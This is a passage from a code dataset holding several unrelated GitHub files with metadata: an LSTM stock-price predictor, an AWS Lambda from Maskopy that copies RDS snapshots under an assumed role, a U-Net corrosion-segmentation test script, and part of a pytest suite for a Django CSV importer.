5)\n\n trainX = np.reshape(trainX, (trainX.shape[0], 1,trainX.shape[1]))\n testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\n step_size = 5\n\n model = Sequential()\n model.add(LSTM(32, input_shape=(1, step_size), return_sequences=True))\n model.add(LSTM(16))\n model.add(Dense(1))\n model.add(Activation('linear'))\n\n model.compile(loss='mean_squared_error', optimizer='adagrad')\n model.fit(trainX,trainY,epochs=50, batch_size=15, verbose=2)\n\n trainPredict = model.predict(trainX)\n testPredict = model.predict(testX)\n\n # DE-NORMALIZING FOR PLOTTING\n\n trainPredict = scaler.inverse_transform(trainPredict)\n trainY = scaler.inverse_transform([trainY])\n testPredict = scaler.inverse_transform(testPredict)\n testY = scaler.inverse_transform([testY])\n\n # TRAINING RMSE\n trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:, 0]))\n print('Train RMSE: %.2f' % (trainScore))\n\n # TEST RMSE\n testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:, 0]))\n print('Test RMSE: %.2f' % (testScore))\n\n # CREATING SIMILAR DATASET TO PLOT TRAINING PREDICTIONS\n trainPredictPlot = np.empty_like(OHLC_avg)\n trainPredictPlot[:, :] = np.nan\n trainPredictPlot[step_size:len(trainPredict) + step_size, :] = trainPredict\n\n # CREATING SIMILAR DATASSET TO PLOT TEST PREDICTIONS\n testPredictPlot = np.empty_like(OHLC_avg)\n testPredictPlot[:, :] = np.nan\n testPredictPlot[len(trainPredict) + (step_size * 2) + 1:len(OHLC_avg) - 1, :] = testPredict\n\n # DE-NORMALIZING MAIN DATASET\n OHLC_avg = scaler.inverse_transform(OHLC_avg)\n\n # PLOT OF MAIN OHLC VALUES, TRAIN PREDICTIONS AND TEST PREDICTIONS\n plt.plot(OHLC_avg, 'g', label='original dataset')\n plt.plot(trainPredictPlot, 'r', label='training set')\n plt.plot(testPredictPlot, 'b', label='predicted stock price/test set')\n plt.legend(loc='upper right')\n plt.xlabel('Time in Days')\n plt.ylabel('OHLC Value of Apple Stocks')\n plt.show()\n\n # PREDICT FUTURE VALUES\n last_val = OHLC_avg[np.array([-1, -2, -3, -4, -5])]\n last_val = scaler.fit_transform(last_val)\n # last_val_scaled = last_val/last_val\n # next_val = model.predict(np.reshape(last_val, (1,1,step_size)))\n # print (\"Last Day Value:\", np.asscalar(last_val))\n # print (\"Next Day Value:\", np.asscalar(last_val*next_val))\n\n pred_vals = []\n pred_vals1 = []\n pred_vals1.append(file)\n for i in range(0, 5):\n # last_val_scaled = last_val/last_val\n print(last_val)\n next_val = model.predict(np.reshape(last_val, (1, 1, step_size)))\n pred_vals.append(next_val)\n print(next_val)\n last_val = np.append(last_val, next_val)\n last_val = np.delete(last_val, 0)\n\n # next_vals.append(np.asscalar(model.predict(np.reshape(, (1,1,step_size)))))\n # last_val1.append(next_vals[i-1]*last_val1[i])\n # pred_vals=scaler.inverse_transform(np.array(pred_vals).reshape(1,5))\n\n ### Scaling Values back using last 5 values as scale standard\n pred_vals = np.array(pred_vals).reshape(1, 5)\n last_val_unscaled = np.array(OHLC_avg_copy[np.array([0, 1, 2, 3, 4])]).reshape(1, 5)\n\n scaler = MinMaxScaler(feature_range=(0, 1))\n last_val_scaler = scaler.fit_transform(last_val_unscaled)\n\n pred_vals_rescaled = scaler.inverse_transform(pred_vals)\n\n a = list(pred_vals_rescaled)[0]\n pred_vals1.append(a)\n\n result.append(pred_vals1)\n\n res = pd.DataFrame(result)\n res.to_csv('results.csv', index=False, header=False)\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "Nandish0409/MiniProject", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.fsencode", "line_number": 17, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 49, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 56, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 67, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "22353516718", "text": "import os\nimport json\nimport re\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nSTS_CLIENT = boto3.client(\"sts\")\nCUSTOM_KMS_KEY = os.environ['custom_kms_key']\nASSUME_ROLE_ARN = os.environ['assume_role_arn']\n\ndef lambda_handler(event, context):\n \"\"\"Lambda handler for the zeroth lambda of the Maskopy process.\n Args:\n event (dict): AWS Lambda uses this parameter to pass in event data to the handler.\n context (Context): AWS Lambda provides runtime info and meta data.\n Returns:\n :obj:`dict` of str:str: Return dict with details of snapshot that was created.\n Raises:\n MaskopyResourceNotFoundException: Raised if inputs are not valid.\n Exception: Generic exception raised\n if final snapshot name already exists in destination.\n \"\"\"\n\n rds_client_local = boto3.client(\"rds\")\n assume_role_session = create_account_session(\n STS_CLIENT,\n ASSUME_ROLE_ARN,\n context.aws_request_id)\n rds_client = assume_role_session.client('rds')\n\n snapshots_created = []\n application_name = event[\"ApplicationName\"]\n cost_center = event[\"CostCenter\"]\n snapshot_identifier = event['CheckInputs']['firstSnapshotIdentifier']\n engine = event['Engine']\n # Get original snapshot_tags to append to cloned snapshot\n snapshot_tags = [\n {'Key': 'ApplicationName', 'Value': 'MASKOPY'},\n {'Key': 'Cost Center', 'Value': cost_center}\n ]\n\n parameter_group = event.get('RdsParameterGroup')\n if not parameter_group:\n parameter_group = get_parameter_group(rds_client, rds_client_local, snapshot_identifier)\n # If maskopy- snapshot exists, then use already existing snapshot.\n new_snapshot_identifier = (f\"MASKOPY-{application_name}-\"\n f\"{re.sub('[^A-Za-z0-9-]+', '', snapshot_identifier)}-\"\n f\"{context.aws_request_id}\")\n new_snapshot = copy_db_snapshot(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine['Type'],\n snapshot_tags, CUSTOM_KMS_KEY)\n if 'aurora' in engine['Type']:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBClusterSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBClusterSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBClusterIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine':engine['Type'],\n 'EngineVersion':engine['Version']\n })\n else:\n snapshots_created.append({\n 'SnapshotName': new_snapshot['DBSnapshotIdentifier'],\n 'SnapshotARN': new_snapshot['DBSnapshotArn'],\n 'InstanceIdentifier': new_snapshot['DBInstanceIdentifier'],\n 'Tags': snapshot_tags,\n 'RdsParameterGroup': parameter_group,\n 'Engine': engine['Type'],\n 'EngineVersion':engine['Version']\n })\n\n return snapshots_created\n\ndef check_snapshot_exists(rds_client, snapshot_identifier, engine):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n if \"aurora\" in engine:\n return check_snapshot_exists_cluster(rds_client, snapshot_identifier)\n else:\n return check_snapshot_exists_instance(rds_client, snapshot_identifier)\ndef check_snapshot_exists_cluster(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n print(f'Checking DB cluster snapshot with the following name: {snapshot_identifier}')\n snapshot_response = rds_client.describe_db_cluster_snapshots(\n DBClusterSnapshotIdentifier=snapshot_identifier)\n return snapshot_response\n except rds_client.exceptions.DBSnapshotNotFoundFault as err:\n return False\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the DB cluster snapshot: {err}')\n #raise\n return False #CHECK IF VALID OUTPUT\ndef check_snapshot_exists_instance(rds_client, snapshot_identifier):\n \"\"\"Function to check if a snapshot exists.\n Args:\n rds_client (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier to check.\n Returns:\n :obj:`dict` of str:str: Snapshot dictionary from AWS boto3 call\n if snapshot exists in session, False otherwise.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n print(f'Checking DB snapshot with the following name: {snapshot_identifier}')\n snapshot_response = rds_client.describe_db_snapshots(\n DBSnapshotIdentifier=snapshot_identifier)\n return snapshot_response\n except rds_client.exceptions.DBSnapshotNotFoundFault as err:\n return False\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the DB snapshot: {err}')\n raise\ndef copy_db_snapshot(rds_client, snapshot_identifier,\n new_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n if 'aurora' in engine:\n return copy_db_snapshot_cluster(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine,\n snapshot_tags, kms_key)\n else:\n return copy_db_snapshot_instance(\n rds_client, snapshot_identifier,\n new_snapshot_identifier, engine,\n snapshot_tags, kms_key)\ndef copy_db_snapshot_cluster(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine, snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_cluster_snapshot_parameters = {\n 'SourceDBClusterSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBClusterSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_cluster_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_cluster_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,\n engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_cluster_snapshot(\n **copy_db_cluster_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBClusterSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. Using existing snapshot.')\n return destination_snapshot_response['DBClusterSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef copy_db_snapshot_instance(rds_client, source_db_snapshot_identifier,\n destination_db_snapshot_identifier, engine,snapshot_tags, kms_key=None):\n \"\"\"Function to create a copy of a rds snapshot, copying tags by default.\n Args:\n rds_client (Client): AWS RDS Client object.\n source_db_snapshot_identifier (str): The source snapshot identifier.\n destination_db_snapshot_identifier (str): The destination snapshot identifier.\n snapshot_tags (dict): A dict of tags to be added to snapshot\n kms_key (str, optional): KMS Key to encrypt snapshot.\n Returns:\n :dict`: Returns a dict of the created snapshot.\n Raises:\n MaskopyResourceException: Raised if resource cannot be accessed.\n \"\"\"\n copy_db_snapshot_parameters = {\n 'SourceDBSnapshotIdentifier': source_db_snapshot_identifier,\n 'TargetDBSnapshotIdentifier': destination_db_snapshot_identifier,\n 'Tags': snapshot_tags\n }\n if kms_key:\n copy_db_snapshot_parameters['KmsKeyId'] = kms_key\n try:\n print(\"Copying DB snapshot with the following parameters: \")\n print(json.dumps(copy_db_snapshot_parameters))\n destination_snapshot_response = check_snapshot_exists(\n rds_client,\n destination_db_snapshot_identifier,engine)\n if not destination_snapshot_response:\n copy_db_snapshot_response = rds_client.copy_db_snapshot(\n **copy_db_snapshot_parameters)\n print(f\"Successfully copied DB snapshot: {destination_db_snapshot_identifier}\")\n return copy_db_snapshot_response['DBSnapshot']\n print(f'{destination_db_snapshot_identifier} already exists. Using existing snapshot.')\n return destination_snapshot_response['DBSnapshots'][0]\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n raise MaskopyResourceException(\"Could not copy snapshot: %s\" % err)\ndef get_parameter_group(rds_client, rds_client_local, snapshot_identifier):\n \"\"\"Function to get the original parameter group name of snapshot\n Args:\n rds_client (Client): AWS RDS Client object with source session.\n rds_client_local (Client): AWS RDS Client object.\n snapshot_identifier (str): The snapshot identifier.\n Returns:\n str: A parameter group attached to original RDS instance of snapshot.\n Raises:\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n snapshot = rds_client.describe_db_snapshots(DBSnapshotIdentifier=snapshot_identifier)\n rds_instance = rds_client.describe_db_instances(\n DBInstanceIdentifier=snapshot['DBSnapshots'][0]['DBInstanceIdentifier'])\n parameter_group = (rds_instance['DBInstances'][0]\n ['DBParameterGroups'][0]\n ['DBParameterGroupName'])\n check_valid_parameter_group(rds_client_local, parameter_group)\n return parameter_group\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n if err.response['Error']['Code'] == 'DBInstanceNotFound':\n print(\"Original RDS not available.\")\n print(err)\n raise Exception(\"Parameter group not provided and cannot be extrapolated.\")\ndef check_valid_parameter_group(rds_client, parameter_group_name):\n \"\"\"Function to check for valid parameter group in destination environment.\n Args:\n rds_client (Client): AWS RDS Client object.\n parameter_group_name (str): The parameter group name.\n Raises:\n MaskopyResourceNotFoundException: Exception raised if resource is not found.\n MaskopyThrottlingException: Exception used to catch throttling from AWS.\n Used to implement a back off strategy.\n \"\"\"\n try:\n if not parameter_group_name:\n raise MaskopyResourceNotFoundException(\"Please enter a valid RdsParameterGroup.\")\n print(f'Validating parameter group: {parameter_group_name}')\n if not rds_client.describe_db_parameter_groups(\n DBParameterGroupName=parameter_group_name):\n raise MaskopyResourceNotFoundException(\"Please check your RdsParameterGroup.\")\n print(f'Validated parameter group: {parameter_group_name}')\n except ClientError as err:\n if err.response['Error']['Code'] == 'Throttling':\n print(\"Throttling occurring.\")\n raise MaskopyThrottlingException(err)\n print(f'There was a problem checking the parameter group: {err}')\n raise\n \ndef create_account_session(sts_client, role_arn, request_id):\n \"\"\"Function to create and assume account role.\n Args:\n sts_client (Client): AWS STS Client object.\n role_arn (str): The arn of the role to assume a session.\n request_id (str): UUID for session to uniquely identify session name.\n Returns:\n :obj:`boto3.session.Session`:\n A session of the role to be used.\n \"\"\"\n sts_response = sts_client.assume_role(\n RoleArn=role_arn,\n RoleSessionName=request_id\n )\n\n return boto3.session.Session(\n aws_access_key_id=sts_response['Credentials']['AccessKeyId'],\n aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],\n aws_session_token=sts_response['Credentials']['SessionToken']\n )\n\nclass MaskopyThrottlingException(Exception):\n \"\"\"Exception raised when AWS request returns a Throttling exception.\n \"\"\"\n\nclass MaskopyResourceNotFoundException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource since the resource does not exist.\n \"\"\"\n\nclass MaskopyResourceException(Exception):\n \"\"\"Exception raised when IAM role or user is not able to access the\n resource.\n \"\"\"\n", "repo_name": "FINRAOS/maskopy", "sub_path": "lambda/02-UseExistingSnapshot/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 15389, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "boto3.client", "line_number": 8, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 25, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 48, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 112, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 138, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 191, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 203, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 231, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 242, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 268, "usage_type": "name"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 294, "usage_type": "name"}, {"api_name": "boto3.session.Session", "line_number": 316, "usage_type": "call"}, {"api_name": "boto3.session", "line_number": 316, "usage_type": "attribute"}]}
+{"seq_id": "20584354716", "text": "import numpy as np\nimport cv2\nfrom keras.preprocessing.image import img_to_array\nimport os\nfrom matplotlib import pyplot as plt\nfrom tqdm import tqdm\nfrom keras.models import load_model\n\n\nif __name__==\"__main__\":\n\n\n image_directory = '/content/rede2_unt/dataset_corrosion_pitting/test'\n mask_directory = '/content/rede2_unt/dataset_corrosion_pitting/test mascara'\n folder_test_results = '/content/rede2_unt/dataset_corrosion_pitting/test_results'\n\n image_dataset = []\n\n path1 = image_directory\n files=sorted(os.listdir(path1))\n for i in tqdm(files):\n imge=cv2.imread(path1+'/'+i,1) #mudar 0 para 1 em imagens com cor\n print(i)\n imge=np.flip(imge, axis=1)\n image_dataset.append(img_to_array(imge))\n\n mask_dataset = []\n \n path2 = mask_directory\n files=sorted(os.listdir(path2))\n for j in tqdm(files):\n imge2=cv2.imread(path2+'/'+j,0) #mudar 0 para 1 em imagens com cor\n\n imge2=np.flip(imge2, axis=1)\n\n mask_dataset.append(img_to_array(imge2))\n print(j)\n\n mask_dataset = np.array(mask_dataset)/255.\n image_dataset = np.array(image_dataset)/255.\n\n print(f\"image_dataset: {len(mask_dataset)}\")\n print(f\"mask_dataset: {len(mask_dataset)}\")\n\n # from sklearn.model_selection import train_test_split\n #IMPORTANTE test_size = 0 SIGNIFICA A PORCENTAGEM QUE FICARA COMO TESTE\n # SE test_size = 0.2, SIGNIFICA QUE 20% DAS IMAGENS SERÃO PARA TESTE E NÃO PARA TREINAMENTO\n\n # X_train, X_test, y_train, y_test = train_test_split(image_dataset, mask_dataset, test_size = 0.2, random_state = 0)\n\n pre_trained_unet_model = load_model('custom-unetweights-8000epochs_29_09.h5', compile=False)\n my_model = pre_trained_unet_model\n\n # IMPORTANTE O train_test_split LITERALMENTE ESTÁ SEPARANDO UMA % PARA TESTES\n # O QUE, NESTE CASO AQUI, NÃO É NECESSÁRIO\n X_test = image_dataset\n y_test = mask_dataset\n\n for i, name in enumerate(files, start=0):\n\n test_img = X_test[i]\n ground_truth = y_test[i]\n\n test_img_input=np.expand_dims(test_img, 0)\n prediction = (my_model.predict(test_img_input)[0,:,:,0] > 0.5).astype(np.uint8)\n\n plt.figure(figsize=(16, 8))\n plt.subplot(231)\n plt.title('Testing Image')\n plt.imshow(test_img, cmap='gray')\n plt.subplot(232)\n plt.title('Testing Label')\n plt.imshow(ground_truth[:,:,0], cmap='gray')\n plt.subplot(233)\n plt.title('Prediction on test image')\n plt.imshow(prediction, cmap='gray')\n #save the file\n if not os.path.exists(folder_test_results):\n os.makedirs(folder_test_results)\n filename = name\n plt.savefig(os.path.join(folder_test_results,filename))\n\n print(name)\n plt.show()", "repo_name": "Corrosao/rede2_unt", "sub_path": "runtest.py", "file_name": "runtest.py", "file_ext": "py", "file_size_in_byte": 2632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 20, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 21, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 30, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 34, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 40, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}]}
+{"seq_id": "41081476881", "text": "from unittest.mock import patch, MagicMock,Mock\nimport pytest\nfrom apps.importacaocsv.import_csv import ImportFromCsv\nfrom apps.loja.models import Produtos,Fabricante\nimport pandas as pd\n\n@pytest.fixture\ndef mock_dados():\n mock_data = {\n 'manufacturer': ['Lenovo', 'Samsung'],\n 'model': ['iPhone', 'Galaxy'],\n 'color': ['black', 'white'],\n 'carrier_plan_type': ['postpaid', 'prepaid'],\n 'quantity': [1, 2],\n 'price': [1000.0, 500.0]\n }\n return mock_data\n\n@pytest.fixture\ndef columns_csv():\n columns=['manufacturer','model','color','carrier_plan_type','quantity','price']\n return columns\n\n\n@pytest.mark.django_db\nclass TestImportFromCsv:\n def setup_method(self):\n mock_arquivo = MagicMock()\n mock_arquivo.name = 'valid.csv'\n self.mock_arquivo = ImportFromCsv(arquivo=mock_arquivo)\n\n def test_erros_retonar_lista(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=False)\n \n resultado = self.mock_arquivo.erros()\n \n assert type(resultado) == list\n assert mock_funcao.validar_dados_necessario.called\n \n def test_erros_retornar_false(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_dados_necessario = Mock(return_value=True)\n \n resultado = self.mock_arquivo.erros()\n \n assert resultado == False\n assert mock_funcao.validar_dados_necessario.called\n \n @patch('pandas.read_csv')\n def test_pega_dataframe_valido_retorna_pands_dataframe(self,read_csv_mock,columns_csv):\n read_csv_mock.return_value = pd.DataFrame([['apple', 's9', 'azul', 'pos', '450', '55.0']], columns=columns_csv)\n\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=True)\n \n resultado = self.mock_arquivo.pega_dataframe()\n\n assert isinstance(resultado,pd.DataFrame)\n assert mock_funcao.validar_arquivo_extensao.called\n \n def test_pega_dataframe_estensao_invalido_retornar_msg_arquivo_invalido(self):\n mock_funcao = self.mock_arquivo\n mock_funcao.validar_arquivo_extensao = Mock(return_value=False)\n \n 